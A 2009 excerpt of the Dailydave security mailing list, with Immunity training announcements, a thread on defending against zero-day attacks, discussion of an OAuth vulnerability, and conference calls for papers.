for shellcode writers, how to use the free tool Immunity Debugger, and
the "hello world" of shellcoding: connect-back and execute. Attendees
need to bring a laptop already installed with Immunity Debugger
(http://www.immunityinc.com/products-immdbg.shtml)
and Python 2.5.
"""

- -dave
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iEYEARECAAYFAknnRdUACgkQtehAhL0gheqFiQCeM5PImbgPJuJ/B6d0QiCpQYcx
fM8AnjO+V6y5zIeZEO+XCuBYl06gsqet
=WIWB
-----END PGP SIGNATURE-----

From bania.piotr at gmail.com  Thu Apr 16 12:56:22 2009
From: bania.piotr at gmail.com (Piotr Bania)
Date: Thu, 16 Apr 2009 18:56:22 +0200
Subject: [Dailydave] Some "old" advisories: MS09-011 and VMware detection/DoS
Message-ID: <010e01c9beb4$4661b910$5ee91953@DIED>

Hello,

Some old advisories of mine, if someone is interested:

1) Microsoft Windows DirectX MJPEG Decoder Remote Heap Corruption
http://www.piotrbania.com/all/adv/ms-directx-mjpeg-adv.txt

2) VMware Workstation* IO Port Request Virtualized Machine Denial Of Service
http://www.piotrbania.com/all/adv/vmware-io-adv.txt


best regards,
Piotr Bania

* - probably other VMware virtualization products are affected as well

-- 
--------------------------------------------------------------------
Piotr Bania - <bania.piotr at gmail.com> - 0xCD, 0x19
Fingerprint: 413E 51C7 912E 3D4E A62A  BFA4 1FF6 689F BE43 AC33
http://www.piotrbania.com  - Key ID: 0xBE43AC33
--------------------------------------------------------------------

               - "The more I learn about men, the more I love dogs."



From nate at root.org  Fri Apr 17 17:29:02 2009
From: nate at root.org (Nate Lawson)
Date: Fri, 17 Apr 2009 14:29:02 -0700
Subject: [Dailydave] If at RSA, stop by Baysec on Monday
Message-ID: <49E8F49E.3010107@root.org>

Hi all. If you're being forced by your company to do booth duty at RSA
in San Francisco next week, feel free to stop by Baysec on Monday night.
It's refreshingly not sponsored, meaning the only beer you get free is
the one you convince your new friend to buy you.  :)

Here are the relevant details:

Monday, April 20th, 7-11 pm
Kate O'Briens
http://www.kateobriens.com/map.cfm
579 Howard St. @ 2nd, San Francisco
(415) 882-7240

Thanks,
Nate

From jeffcz at gmail.com  Sun Apr 19 16:55:09 2009
From: jeffcz at gmail.com (Jeffrey Czerniak)
Date: Sun, 19 Apr 2009 16:55:09 -0400
Subject: [Dailydave] How do I defend against 0day?
Message-ID: <887088630904191355l6b9a5a96w4222490099d38135@mail.gmail.com>

(Moved this conversation to dailydave per Dave's suggestion)

Pardon my naivete... I am somewhere on the spectrum between "paid
security professional" and "Symantec said zero infections, how did
they get my bank password?"    I'm one of those schmoes who reads
security blogs, follows the NSA hardening guidelines, patches
regularly, browses with Firefox/NoScript, but still realizes that
there are 0day threats out there that could compromise my machine.

On Twitter, Adam Shostack argued that in effect, I'm doing the right
thing.  (http://twitter.com/adamshostack/status/1527933467)

Dave responded, no, 0day is rampant and I'm screwed.
(http://twitter.com/daveaitel/status/1553055665)

When I asked Dave what I should be doing to protect myself, he
suggested I buy a copy of CANVAS, an Early Updates subscription, and
take a class from Immunity.
(http://twitter.com/daveaitel/status/1554813723)

I have a couple of questions now.   One, how do I put up a reasonable
defense against 0day vulnerabilities?   Two, how does purchasing a
bunch of 0day from Immunity help me reach that goal?   It seems like
the purchase of CANVAS Early Updates would bring me from "I am
certainly vulnerable to undefined 0day threats, and don't know how to
protect myself" to "I now know about dozens of specific
vulnerabilities in the software I use, and am scared shitless".

Does CANVAS Early Updates come with a live dynamic binary patching
system that protects me from the threats you've found?   Otherwise, I
don't know why I'd buy CANVAS since I'm not interested in hacking into
other people's computers, and the non-disclosure agreement I'd have to
sign would prevent me from disclosing those vulnerabilities to the
vendors, thus I'm not really any safer.

Let me ask this question from another perspective:  let's say I won
the lottery tomorrow and bought an Early Updates subscription.
Certainly the IP I'd be buying access to is valuable to Immunity and
you don't want it shared with vendors or your competition.   What
security precautions would you insist I take on the machine I stored
that IP on?

Thanks for reading this,

Jeff
geekable.com

From rgula at tenablesecurity.com  Mon Apr 20 11:04:45 2009
From: rgula at tenablesecurity.com (Ron Gula)
Date: Mon, 20 Apr 2009 11:04:45 -0400
Subject: [Dailydave] How do I defend against 0day?
In-Reply-To: <887088630904191355l6b9a5a96w4222490099d38135@mail.gmail.com>
References: <887088630904191355l6b9a5a96w4222490099d38135@mail.gmail.com>
Message-ID: <49EC8F0D.6060505@tenablesecurity.com>

Your two main questions:

> One, how do I put up a reasonable defense against 0day vulnerabilities?

The short answer is to minimize complexity and then expect it to break.

You need to minimize your overall attack surface and then look for
failures. If you've already gone through everything on your network
and your know it has been patched, configured correctly and is supposed
to be there, then the next thing you need to ask yourself is what to
expect when these services that you depend on get popped by a zero day.
If you assume that some of your key services will get popped by a zero
day, you might make changes in your architecture to minimize the effect
of a compromise.

> Two, how does purchasing a bunch of 0day from Immunity help me reach
> that goal?

Some of the zero-days that you don't know about will be covered by the
Immunity feed. If you pen test with these zero-days that are not in
the general public, you can test your systems to see how they react.
Hopefully you will find that your admins, help desk, NIDS, SIM, .etc
sees something that alerts you to the presence of a compromised system.

Ron Gula
Tenable Network Security




From jeffcz at gmail.com  Mon Apr 20 12:02:21 2009
From: jeffcz at gmail.com (Jeffrey Czerniak)
Date: Mon, 20 Apr 2009 12:02:21 -0400
Subject: [Dailydave] How do I defend against 0day?
In-Reply-To: <2fd9390e0904200845n10720eefqbf3ec372d08b4538@mail.gmail.com>
References: <887088630904191355l6b9a5a96w4222490099d38135@mail.gmail.com>
	<2fd9390e0904200845n10720eefqbf3ec372d08b4538@mail.gmail.com>
Message-ID: <887088630904200902u46d9cb24p44ba7bb8aa9b411a@mail.gmail.com>

On Mon, Apr 20, 2009 at 11:37 AM, Halvar Flake <halvar at gmx.de> wrote:
> I hope my post is not perceived as horribly rude, and please be aware
> that I do not intend to offend in any way. And apologies up front if I do.
>
> Is this a serious post ?

Yes.

On Mon, Apr 20, 2009 at 11:45 AM, Andre Gironda <andreg at gmail.com> wrote:
> Every 0-day threat is different. ?Imagine telling doctors that they
> can't allow disease, infections, et al to spread in a dying patient in
> order to determine root-cause (ala House, the TV show). ?If you are
> interested in understanding the problem, then you should also be
> interested in "hacking into other people's computers" (or at least
> your own computers).

Ok, I'll accept the premise.  So let's say I buy CANVAS with all the
extra toppings, and use it to hack into my own machine.   From the
self-administered pen test, I discover that I'm vulnerable to x remote
root exploits, and that my browser can be exploited via y different
heap overflows in Firefox.

If I am a rational decision-maker, what do I do with this information?
  My first instinct would be to tell the vendors, "fix this stuff
now!"    But according to immunitysec.com, I can't do that since
CANVAS et al. are protected via NDA.

So how do I leverage this new information to make myself safer and/or
more secure?

Jeff
geekable.com

From jeffcz at gmail.com  Mon Apr 20 13:11:13 2009
From: jeffcz at gmail.com (Jeffrey Czerniak)
Date: Mon, 20 Apr 2009 13:11:13 -0400
Subject: [Dailydave] How do I defend against 0day?
In-Reply-To: <2fd9390e0904200954l1cb66d77ma7fa9ba8b20bba26@mail.gmail.com>
References: <887088630904191355l6b9a5a96w4222490099d38135@mail.gmail.com>
	<2fd9390e0904200845n10720eefqbf3ec372d08b4538@mail.gmail.com>
	<887088630904200902u46d9cb24p44ba7bb8aa9b411a@mail.gmail.com>
	<2fd9390e0904200954l1cb66d77ma7fa9ba8b20bba26@mail.gmail.com>
Message-ID: <887088630904201011k49b69353n984e037cd9915c56@mail.gmail.com>

On Mon, Apr 20, 2009 at 12:54 PM, Andre Gironda <andreg at gmail.com> wrote:
> On Mon, Apr 20, 2009 at 9:02 AM, Jeffrey Czerniak <jeffcz at gmail.com> wrote:
>> So how do I leverage this new information to make myself safer and/or
>> more secure?
>
> Is this a serious post?
>

Yes.

In the meantime, I have figured out two ways that buying access to
0day under NDA can make me more secure:

1) Switch to an open-source operating system and open-source
applications.  Create custom forks of each of my applications' source
trees, and patch my forks against the 0day vulnerabilities I
purchased.  Don't share my patches with the outside world.
2) Give up on computers and switch to a farming career.

(Ok, maybe #2 wasn't so serious.)

What am I missing?  Dave is still in business after all these years,
which means he must have plenty of customers.  I had always assumed
that the overwhelming majority of his customers are fellow pentesters,
who buy CANVAS to guarantee they can break into systems.

Are there folks on this list who buy CANVAS but who aren't pentesters?
 If so, what do you get out of CANVAS?

Seriously,
Jeff
geekable.com

From taosecurity at gmail.com  Mon Apr 20 19:58:23 2009
From: taosecurity at gmail.com (Richard Bejtlich)
Date: Mon, 20 Apr 2009 19:58:23 -0400
Subject: [Dailydave] How do I defend against 0day?
In-Reply-To: <887088630904191355l6b9a5a96w4222490099d38135@mail.gmail.com>
References: <887088630904191355l6b9a5a96w4222490099d38135@mail.gmail.com>
Message-ID: <120ef0530904201658h54160cfet1a7864b4af7f30cd@mail.gmail.com>

On Sun, Apr 19, 2009 at 4:55 PM, Jeffrey Czerniak <jeffcz at gmail.com> wrote:
> (Moved this conversation to dailydave per Dave's suggestion)
>
> Pardon my naivete... I am somewhere on the spectrum between "paid
> security professional" and "Symantec said zero infections, how did
> they get my bank password?" ? ?I'm one of those schmoes who reads
> security blogs, follows the NSA hardening guidelines, patches
> regularly, browses with Firefox/NoScript, but still realizes that
> there are 0day threats out there that could compromise my machine.
>
> On Twitter, Adam Shostack argued that in effect, I'm doing the right
> thing. ?(http://twitter.com/adamshostack/status/1527933467)
>
> Dave responded, no, 0day is rampant and I'm screwed.
> (http://twitter.com/daveaitel/status/1553055665)
>
> When I asked Dave what I should be doing to protect myself, he
> suggested I buy a copy of CANVAS, an Early Updates subscription, and
> take a class from Immunity.
> (http://twitter.com/daveaitel/status/1554813723)

I find this fascinating.  Can someone who advocates this point of view
take the next steps?  Assuming you buy CANVAS and subscribe to EU, and
know what Immunity knows, and can test using CANVAS, what next?

Thank you,

Richard

From nate at root.org  Mon Apr 20 20:36:53 2009
From: nate at root.org (Nate Lawson)
Date: Mon, 20 Apr 2009 17:36:53 -0700
Subject: [Dailydave] How do I defend against 0day?
In-Reply-To: <887088630904200902u46d9cb24p44ba7bb8aa9b411a@mail.gmail.com>
References: <887088630904191355l6b9a5a96w4222490099d38135@mail.gmail.com>	<2fd9390e0904200845n10720eefqbf3ec372d08b4538@mail.gmail.com>
	<887088630904200902u46d9cb24p44ba7bb8aa9b411a@mail.gmail.com>
Message-ID: <49ED1525.8010002@root.org>

Jeffrey Czerniak wrote:
> On Mon, Apr 20, 2009 at 11:45 AM, Andre Gironda <andreg at gmail.com> wrote:
>> Every 0-day threat is different.  Imagine telling doctors that they
>> can't allow disease, infections, et al to spread in a dying patient in
>> order to determine root-cause (ala House, the TV show).  If you are
>> interested in understanding the problem, then you should also be
>> interested in "hacking into other people's computers" (or at least
>> your own computers).
> 
> Ok, I'll accept the premise.  So let's say I buy CANVAS with all the
> extra toppings, and use it to hack into my own machine.   From the
> self-administered pen test, I discover that I'm vulnerable to x remote
> root exploits, and that my browser can be exploited via y different
> heap overflows in Firefox.
> 
> If I am a rational decision-maker, what do I do with this information?
>   My first instinct would be to tell the vendors, "fix this stuff
> now!"    But according to immunitysec.com, I can't do that since
> CANVAS et al. are protected via NDA.
> 
> So how do I leverage this new information to make myself safer and/or
> more secure?

You find a mitigating approach ("disable javascript in PDF readers" or
"switch from acrobat reader to preview" or "add Diehard to PDF reader in
addition to browsers") and apply it to your desktops. Then you re-test
and make sure you've fixed the problem.

If this doesn't make sense to you or sounds too hard, then you're
probably not in an organization where 0-day matters. Relax and wait for
vendor patches that will appear some year.

-- 
Nate

From nathan.landon at digitaloperatives.com  Mon Apr 20 22:02:13 2009
From: nathan.landon at digitaloperatives.com (Nathan Landon)
Date: Mon, 20 Apr 2009 22:02:13 -0400
Subject: [Dailydave] How do I defend against 0day?
In-Reply-To: <120ef0530904201658h54160cfet1a7864b4af7f30cd@mail.gmail.com>
References: <887088630904191355l6b9a5a96w4222490099d38135@mail.gmail.com> 
	<120ef0530904201658h54160cfet1a7864b4af7f30cd@mail.gmail.com>
Message-ID: <37837550904201902u44d7ea1ds11554c71a4d6580b@mail.gmail.com>

My argument would be that a security guy or administrator could use it as
amplifying information while speaking to executives at their
company.   Executives (still) don't understand zero-days,  or generally
anything about how computer security works.

CANVAS can help those IT folks amplify the information and demonstrate the
importance of taking action (disabling services, changing vendors, buy more
security technologies,  etc)

I personally have built exploits to prove that something is possible.
Ultimately to show the potential for catastrophic failure or system/network
compromise.  These demonstrations always got executives "thinking".

Nate





Nathan Landon
Digital Operatives
www.digitaloperatives.com
Cell: 808-221-9172


On Mon, Apr 20, 2009 at 7:58 PM, Richard Bejtlich <taosecurity at gmail.com>wrote:

> On Sun, Apr 19, 2009 at 4:55 PM, Jeffrey Czerniak <jeffcz at gmail.com>
> wrote:
> > (Moved this conversation to dailydave per Dave's suggestion)
> >
> > Pardon my naivete... I am somewhere on the spectrum between "paid
> > security professional" and "Symantec said zero infections, how did
> > they get my bank password?"    I'm one of those schmoes who reads
> > security blogs, follows the NSA hardening guidelines, patches
> > regularly, browses with Firefox/NoScript, but still realizes that
> > there are 0day threats out there that could compromise my machine.
> >
> > On Twitter, Adam Shostack argued that in effect, I'm doing the right
> > thing.  (http://twitter.com/adamshostack/status/1527933467)
> >
> > Dave responded, no, 0day is rampant and I'm screwed.
> > (http://twitter.com/daveaitel/status/1553055665)
> >
> > When I asked Dave what I should be doing to protect myself, he
> > suggested I buy a copy of CANVAS, an Early Updates subscription, and
> > take a class from Immunity.
> > (http://twitter.com/daveaitel/status/1554813723)
>
> I find this fascinating.  Can someone who advocates this point of view
> take the next steps?  Assuming you buy CANVAS and subscribe to EU, and
> know what Immunity knows, and can test using CANVAS, what next?
>
> Thank you,
>
> Richard
>  _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090420/22192b9c/attachment-0001.htm 

From halvar at gmx.de  Tue Apr 21 10:23:20 2009
From: halvar at gmx.de (Halvar Flake)
Date: 21 Apr 2009 16:23:20 +0200
Subject: [Dailydave] How do I defend against 0day?
In-Reply-To: <887088630904201011k49b69353n984e037cd9915c56@mail.gmail.com>
References: <887088630904191355l6b9a5a96w4222490099d38135@mail.gmail.com>	<2fd9390e0904200845n10720eefqbf3ec372d08b4538@mail.gmail.com>	<887088630904200902u46d9cb24p44ba7bb8aa9b411a@mail.gmail.com>	<2fd9390e0904200954l1cb66d77ma7fa9ba8b20bba26@mail.gmail.com>
	<887088630904201011k49b69353n984e037cd9915c56@mail.gmail.com>
Message-ID: <49EDD6D8.8030702@gmx.de>

Since this was a serious question, my advice regarding protection from 0day:

1) If you are a private entity with a limited downside to data loss,
don't bother protecting. Insure.
2) Everybody lives with insecure doorlocks. Nobody worries about 0day
against locks: Insurance will cover you.
3) If you feel like you absolutely have to protect against 0day, do:
    2.1) Minimize the amount of code running. Try to cut it to a
quantity that you can read & understand. (Good luck).
    2.2) Make sure you have something equivalent to pax
    2.3) Avoid anything that would allow an attacker active scripting in
any way, shape, or form. No Jscript, No Flash etc.
    2.4) Contemplate recompiling the system from scratch using data
structure layout randomization
    2.5) Try to understand published attack methods to better be able to
evaluate countermeasures
    2.6) Monitor the system carefully. Log all network traffic in and
out, and try to account for any outflow.
    2.7) Avoid giving any attacker any information about applications,
OS versions etc.

If you are still getting work done at this point, I can invent more
productivity-destroying measures :)

0day protection is a bit like minimizing risk for STDs. As you add
layers of protection, you approach abstinence quickly --
e.g. reaching a state where you still carry a risk of dying but have
none of the fun.

Cheers,
Halvar

From pusscat at metasploit.com  Tue Apr 21 09:27:00 2009
From: pusscat at metasploit.com (Lurene Grenier)
Date: Tue, 21 Apr 2009 09:27:00 -0400
Subject: [Dailydave] How do I defend against 0day?
In-Reply-To: <887088630904201011k49b69353n984e037cd9915c56@mail.gmail.com>
References: <887088630904191355l6b9a5a96w4222490099d38135@mail.gmail.com>
	<2fd9390e0904200845n10720eefqbf3ec372d08b4538@mail.gmail.com>
	<887088630904200902u46d9cb24p44ba7bb8aa9b411a@mail.gmail.com>
	<2fd9390e0904200954l1cb66d77ma7fa9ba8b20bba26@mail.gmail.com>
	<887088630904201011k49b69353n984e037cd9915c56@mail.gmail.com>
Message-ID: <8e00af420904210627o273b0eb7g63d2133e5a642a35@mail.gmail.com>

> 1) Switch to an open-source operating system and open-source
> applications. ?Create custom forks of each of my applications' source
> trees, and patch my forks against the 0day vulnerabilities I
> purchased. ?Don't share my patches with the outside world.


Why is an open source operating system necessary for the creation of patches?

Maybe Dave is suggesting you take classes and look at canvas so that
you gain an understanding of 0-day attacks, both in how to create
them, and thus how to defend against them by learning what makes them
feasible in the real world (through classes), and also by learning the
state of the art of exploitation of modern operating systems (through
canvas)

Then with that understanding, and with the knowledge of what is cost
effective to your enterprise (functionality vs. sensitivity of data)
you can take reasonable steps to protect that enterprise.

Without this knowledge though, you're effed.

-- 
~ Lurene

From dave.aitel at gmail.com  Wed Apr 22 18:20:13 2009
From: dave.aitel at gmail.com (Dave Aitel)
Date: Wed, 22 Apr 2009 18:20:13 -0400
Subject: [Dailydave] OAuth vulnerabilities,
	and insane partial disclosure people.
Message-ID: <b581b3220904221520y3074c907h207684386ceb6b33@mail.gmail.com>

http://news.cnet.com/8301-13577_3-10225103-36.html

Apparently OAuth has a vulnerability (which was pretty obvious when
Twitter pulled it down without saying why).  But, in the spirit of
Christmas, they've decided to say there IS a vulnerability, but we're
not going to tell you what it is. Anyone care to guess?

-dave

From meddington at gmail.com  Wed Apr 22 20:40:58 2009
From: meddington at gmail.com (Michael Eddington)
Date: Wed, 22 Apr 2009 17:40:58 -0700
Subject: [Dailydave] OAuth vulnerabilities,
 and insane partial disclosure people.
In-Reply-To: <b581b3220904221520y3074c907h207684386ceb6b33@mail.gmail.com>
References: <b581b3220904221520y3074c907h207684386ceb6b33@mail.gmail.com>
Message-ID: <49EFB91A.2020506@gmail.com>

Well, one thing that jumps out is the signing of the requests is the
only part that truly identifies the consumer to the protected resource,
but the signing is optional and up to the consumer to request.  Since
this is a clear-text protocol that is meant to work over non-SSL'd
connections there is no assumption of privacy for any of the tokens in play.

See section "9.4 PLAINTEXT" in the 1.0 specification
(http://oauth.net/core/1.0)

Additionally, the assertion that PLAINTEXT signing is okay if performed
over SSL seems bogus since SSL does not provide identify of the client,
only server by default, hence anyone could perform an SSL connection and
provide the oauth tokens with no signing to impersonate a consumer.

Finally, I find it very amusing that the protocol transfers secrets in
the clear, for example the oauth_token_secret is provided to the
consumer over HTTP response and it not encrypted.  Should the secret
ever be used by itself to perform signing we will have a problem.

Still, I'm not sure if any of these qualifies for a "social engineering
attack" as stated in the cnet article.  Granted, we should only take
there explanation with a grain of salt.

mike

Dave Aitel wrote:
> http://news.cnet.com/8301-13577_3-10225103-36.html
>
> Apparently OAuth has a vulnerability (which was pretty obvious when
> Twitter pulled it down without saying why).  But, in the spirit of
> Christmas, they've decided to say there IS a vulnerability, but we're
> not going to tell you what it is. Anyone care to guess?
>
> -dave
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
>   


From msuiche at gmail.com  Thu Apr 23 03:49:23 2009
From: msuiche at gmail.com (Matthieu Suiche)
Date: Thu, 23 Apr 2009 09:49:23 +0200
Subject: [Dailydave] OAuth vulnerabilities,
	and insane partial disclosure 	people.
In-Reply-To: <49EFB91A.2020506@gmail.com>
References: <b581b3220904221520y3074c907h207684386ceb6b33@mail.gmail.com>
	<49EFB91A.2020506@gmail.com>
Message-ID: <36615a170904230049je67da7dw24a6d54c86fcd4a7@mail.gmail.com>

Dave... You are a very bad guy.

http://groups.google.com/group/oauth/browse_thread/thread/20e12ace524dba3?pli=1

"Please do not speculate or publicly discuss the actual details of this or
other threats." said Eran

Anyway, details are public now:
http://www.hueniverse.com/hueniverse/2009/04/explaining-the-oauth-session-fixation-attack.html#more
http://oauth.net/advisories/2009-1

--
Matthieu Suiche



On Thu, Apr 23, 2009 at 2:40 AM, Michael Eddington <meddington at gmail.com> wrote:
> Well, one thing that jumps out is the signing of the requests is the
> only part that truly identifies the consumer to the protected resource,
> but the signing is optional and up to the consumer to request. ?Since
> this is a clear-text protocol that is meant to work over non-SSL'd
> connections there is no assumption of privacy for any of the tokens in play.
>
> See section "9.4 PLAINTEXT" in the 1.0 specification
> (http://oauth.net/core/1.0)
>
> Additionally, the assertion that PLAINTEXT signing is okay if performed
> over SSL seems bogus since SSL does not provide identify of the client,
> only server by default, hence anyone could perform an SSL connection and
> provide the oauth tokens with no signing to impersonate a consumer.
>
> Finally, I find it very amusing that the protocol transfers secrets in
> the clear, for example the oauth_token_secret is provided to the
> consumer over HTTP response and it not encrypted. ?Should the secret
> ever be used by itself to perform signing we will have a problem.
>
> Still, I'm not sure if any of these qualifies for a "social engineering
> attack" as stated in the cnet article. ?Granted, we should only take
> there explanation with a grain of salt.
>
> mike
>
> Dave Aitel wrote:
>> http://news.cnet.com/8301-13577_3-10225103-36.html
>>
>> Apparently OAuth has a vulnerability (which was pretty obvious when
>> Twitter pulled it down without saying why). ?But, in the spirit of
>> Christmas, they've decided to say there IS a vulnerability, but we're
>> not going to tell you what it is. Anyone care to guess?
>>
>> -dave
>> _______________________________________________
>> Dailydave mailing list
>> Dailydave at lists.immunitysec.com
>> http://lists.immunitysec.com/mailman/listinfo/dailydave
>>
>
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave
>

From alex at sotirov.net  Thu Apr 23 19:11:44 2009
From: alex at sotirov.net (Alexander Sotirov)
Date: Thu, 23 Apr 2009 19:11:44 -0400
Subject: [Dailydave] WOOT'09 call for papers
Message-ID: <20090423231144.GA16691@MacBook.local>

The CFP for the 3rd USENIX Workshop on Offensive Technologies is now
available at http://www.usenix.org/woot09/cfpa

WOOT'09 aims to bring together researchers and practitioners in system
security to present research advancing the understanding of attacks on
operating systems, networks, and applications. WOOT seeks submissions
that reflect the state of the art in offensive computer security
technology--either surveying previously poorly known areas or presenting
entirely new attacks. We welcome papers on offensive technologies,
including but not limited to:

 - Vulnerability research (software auditing, reverse engineering)
 - Exploitation techniques and automation
 - Network-based attacks (routing, DNS, IDS/IPS/firewall evasion)
 - Reconnaissance (scanning, software, and hardware fingerprinting)
 - Malware design and implementation (rootkits, viruses, bots, worms)
 - Denial-of-service attacks
 - Web and database security
 - Penetration testing
 - Weaknesses in deployed systems (VoIP, telephony, wireless, games)
 - Practical cryptanalysis (hardware, DRM, etc.)

WOOT'09 will be a one-day event on Monday, August 10. It will be co-located
with the 18th USENIX Security Symposium in Montreal, Canada.

The submission deadline for papers is 11:59 p.m. PDT on
Tuesday, May 26, 2009.

We look forward to your submissions.

Dan Boneh, Stanford University
Alexander Sotirov, independent security researcher

WOOT'09 Program Chairs
woot09chairs at usenix.org
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 194 bytes
Desc: not available
Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090423/03cdf357/attachment.pgp 

From no-reply at ekoparty.com.ar  Thu Apr 23 18:02:20 2009
From: no-reply at ekoparty.com.ar (ekoparty security)
Date: Thu, 23 Apr 2009 19:02:20 -0300
Subject: [Dailydave] CFP for ekoparty 0x09 is now open! [ Buenos Aires,
	Argentina ]
Message-ID: <85C57A8C-C7A2-4EBF-A529-5042C90FF111@ekoparty.com.ar>

[*]  ekoparty Security Conference and Trainings - 5th edition [*]

  www.ekoparty.com.ar
  Trainings: September 14-16 / Conference: September 17-18, 2009
  Ciudad Autonoma de Buenos Aires, Argentina

[*] CALL FOR PAPERS is now Open!

ekoparty is a one-of-a-kind event in South America; an annual security
conference held in Buenos Aires where security specialists from all over
Latin America (and beyond) have the chance to get involved with
state-of-art techniques, vulnerabilities and tools in a relaxed  
environment
which has not been seen before.

The fifth edition of ekoparty is expected to bring together over 500
security specialists from around the world in the most deep-knowledge
technical conference of Latin America.

This is not just a completely technical conference, it also has a lot of
fun activities like lockpicking, wardriving, wargames, after hours and
even a awesome aftercon party!.

On this edition we are going to have simultaneous translation of all the
lectures offering the chance to attendies from foreign countries to  
understand
spanish and portuguese speakers as well locals to understand english  
spoken talks.

ekoparty is recruiting everyone who is interested in showing their
researches and/or develops in the field of Information Security.

[*] WHERE TO SEND LECTURES:

Abstracts not exceeding 250 words should be submitted (in plain text  
format) to: charlas/<at>\ekoparty.com.ar for review and
possible inclusion in the programme.

Submissions are due no later than August 1.

Topics of interest include, but are not limited to the following:

- Asado Debugging
- 0 days
- Web Security
- Embedded Systems Technologies
- GSM, GPRS and CDMA Security
- RFID Security
- VoIP Security
- Wireless Security
- Exploitation
- IPv6 Security
- Attack and Defense Techniques
- Reverse Engineering
- Application Security, Testing, Fuzzing
- Code Auditing
- Virtualization
- Malicious Code
- Databases
- Viruses, Worms, and Trojans
- e-crime, Phishing and Botnets
- Malware, Crimeware
- Banking Security
- Phreaking
- Hardware hacking
- Cryptography
- Forensics/AntiForensics


[*] HOW TO SEND LECTURES:


Submissions should include the following information:


* Title
* Type:
    - 45 minutes lecture
    - 15 minutes lecture (turbo talks)
    - Training (1 - 2 day)
* Author(s): First and Last name, short personal description, country  
origin, association or company they belong to if applicable.
* Estimated delivery time: Speeches usually last 45 minutes. In case  
of needing more or less time it is going to be evaluated in pre- 
selection stage.
* Short description of the speech: One or two paragraphs explaining - 
not so briefly-  delivery content.
* Target speech level: To classify as: newbie/intermediate/advanced/ 
expert.
* Author/s's Phone number.

SPEAKER PRIVILIGES

        Round-trip airfare ticket
        3 days accomodation
        Special BBQ
        ekoparty's City Tour
        Extra ticket to the conference

TRAINER PRIVILIGES

        50 % net profit of the Class
        2/3 days accomodation
        Special BBQ
        ekoparty's City Tour
        Ticket to the conference

[*] IMPORTANTE DATES:

        April 23 - CFP is Open
        August 1 - CFP is Closed
        September 14-16 - ekoparty Trainings
        September 17-18 - ekoparty Conference

[*] SPONSOR INFORMATION

If you are interested in supporting our conference contact us at  
sponsor/<at>\ekoparty.com.ar

[*] GET IN TOUCH

  Website		http://www.ekoparty.com.ar
  Blog		http://blog.ekoparty.com.ar
  Mailing-list	http://groups.google.com/group/ekoparty
  Twitter		https://twitter.com/ekoparty
  Facebook 	http://www.facebook.com/pages/ekoparty-security- 
conference/16162244291
  LinkedIn   	http://www.linkedin.com/e/gis/42839/3C56B47CC210

Best regards,
ekoparty security conference staff

From nate at root.org  Thu Apr 23 23:37:28 2009
From: nate at root.org (Nate Lawson)
Date: Thu, 23 Apr 2009 20:37:28 -0700
Subject: [Dailydave] OAuth vulnerabilities,
 and insane partial disclosure  people.
In-Reply-To: <36615a170904230049je67da7dw24a6d54c86fcd4a7@mail.gmail.com>
References: <b581b3220904221520y3074c907h207684386ceb6b33@mail.gmail.com>	<49EFB91A.2020506@gmail.com>
	<36615a170904230049je67da7dw24a6d54c86fcd4a7@mail.gmail.com>
Message-ID: <49F133F8.5070207@root.org>

Matthieu Suiche wrote:
> Dave... You are a very bad guy.
> 
> http://groups.google.com/group/oauth/browse_thread/thread/20e12ace524dba3?pli=1
> 
> "Please do not speculate or publicly discuss the actual details of this or
> other threats." said Eran
> 
> Anyway, details are public now:
> http://www.hueniverse.com/hueniverse/2009/04/explaining-the-oauth-session-fixation-attack.html#more
> http://oauth.net/advisories/2009-1

The overlap between web 2.0 and cryptographers 1.0 is the empty set. See
also "rainbow tables fiasco", wherein web 2.0 redesigned password
salting, poorly.

-- 
Nate

From dave at immunityinc.com  Fri Apr 24 09:49:30 2009
From: dave at immunityinc.com (dave)
Date: Fri, 24 Apr 2009 09:49:30 -0400
Subject: [Dailydave] Learn how to exploit heap overflows - the Nico way.
Message-ID: <49F1C36A.3010800@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

May 11-14[1] Immunity is going to be teaching Heap Overflows here in
Miami. There really is not another class like this - it's understandable
by normal humans and yet at the end of it, students are able to exploit
heap overflows[2], and get a taste of bypassing Vista's heap protections.

This is the same class we put Immunity exploit writers through to get
them up to speed on heap exploitation, and there's lots of non-public
information inside. I find that people rarely get to _see_ a real
exploit, let alone have one of the best exploit writers alive give them
a personal walk-through of how these things work.

Email admin at immunityinc.com to sign up.

Also, there will be parrots.

Thanks,
Dave Aitel
Immunity, Inc.
[1] http://www.immunityinc.com/education-currentschedule.shtml
[2] We use VisualSploit to make it approachable without making everyone
learn Python, our API, and heap overflow methodology all at once.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iEYEARECAAYFAknxw2oACgkQtehAhL0gherojwCfeGcNRcIhq3u4sGCHBwFqNEO0
rUkAn2/JUfj6+296vfgebnigiuhBg1gr
=MJE8
-----END PGP SIGNATURE-----

From sinan.eren at immunitysec.com  Fri Apr 24 17:40:36 2009
From: sinan.eren at immunitysec.com (sinan.eren at immunitysec.com)
Date: Fri, 24 Apr 2009 16:40:36 -0500 (EST)
Subject: [Dailydave] cloud!
Message-ID: <Pine.LNX.4.64.0904241639540.8016@mail.immunityinc.com>



after enduring several integer overwraps within the section of neural nets 
that handles the meaning of the word "cloud" in my very dried out brain, I 
wish to state the following;


Virtualization has been the best thing that has happened to foreign 
intelligence since Aldrich Ames.




regards,
Sinan Eren
Immunity Inc.


From dave at immunityinc.com  Mon Apr 27 12:23:26 2009
From: dave at immunityinc.com (dave)
Date: Mon, 27 Apr 2009 12:23:26 -0400
Subject: [Dailydave] 4420 + Rich Smith == All your CANVAS questions answered!
Message-ID: <49F5DBFE.2070008@immunityinc.com>

-----BEGIN PGP SIGNED MESSAGE-----
